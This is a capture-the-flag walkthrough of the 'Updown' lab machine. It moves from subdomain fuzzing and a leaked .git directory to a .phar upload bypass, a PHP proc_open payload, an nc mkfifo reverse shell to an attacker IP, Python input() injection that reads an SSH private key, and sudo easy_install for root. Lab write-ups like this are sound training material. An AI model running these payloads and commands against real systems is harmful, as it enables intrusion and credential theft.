Updown, a medium rated linux machine involved fuzzing for subdomain leading to a dev domain which was accessible through a special header found from .git directory, the site had a file upload for the purpose of check the reachability of the sites in that file which lead to remote code execution and giving us a shell as www-data, in developer user’s directory there exists a script using input function which is vulnerable as it basically equivalent to eval function which can execute commands giving us shell as developer user, from there escalation privileges to root by running easy_install .
NMAP
Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
The web page has a functionality to check if any site is up also it shows us a domain name siteisup.htb so let's add this in hosts file
With the debug mode enabled we can see the response made on the url which leads to Server Side Request Forgery (SSRF)
I tried using the file protocol to read local file file:///etc/passwd but it was blocked
On the domain name, we can fuzz for subdomains with wfuzz
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131This finds a subdomain dev with 403 status code
We can try accessing it through the status check as there exists SSRF
But it shows that it’s down so there maybe some filtering going on dev site, fuzzing for files and directories, it shows /dev but it returns a blank page
So fuzzing at /dev/, we'll find .git
We can download .git though wget recursively with --recusrive
wget --recursive http://10.10.11.177/dev/.git/After downloading the files, navigate to directory which has .git and run git checkout . to recover the files
Checking changelog.txt it talks about removing the upload option
.htaccess file shows us a header if it's not in the request, the request will be denied
I used a burp extension called Add Custom Header so that on every request the special header gets added
Looking at checker.php file it checks for file extensions which may lead to uploading php files to get code execution
It’s checking for all extensions except for .phar, but even if we upload it it's going to read the contents of the file, make a request to see if there's 200 status code and it's going to delete the file after making a request to each of the content available in the file
To get code execution, we can make the site make a request to a site which isn’t reachable so it’s going to try to make a request to that site for sometime and our uploaded file won’t get deleted
Foothold
From phpinfo() we can see most of the functions are disabled that could allow command execution, to find out which function can used to get command execution which can use this script
We can abuse proc_open to get command execution
<?php
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
// $pipes now looks like this:
// 0 => writeable handle connected to child stdin
// 1 => readable handle connected to child stdout
// Any error output will be appended to /tmp/error-output.txt
fwrite($pipes[0], "id");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>On uploading the file, we’ll get the output of id command
Using nc mkinfo we can get the reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/fPrivilege Escalation (developer)
In developer's directory we can find siteisup binary along with it's source code which can run as developer because of SUID
We can exploit this by importing os module and executing id command
__import__('os').system('id')From here we can get the ssh key and login as developer user
__import__('os').system('cat /home/developer/.ssh/id_rsa')Privilege Escalation (root)
Running sudo -l will show that we can run /usr/local/bin/easy_install as root user
We can abuse this by checking GTFOBINS for the abuse
References
- https://burpsuite.guide/extensions/add-custom-header/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
- https://github.com/teambi0s/dfunc-bypasser
- https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html
- https://gtfobins.github.io/gtfobins/easy_install/
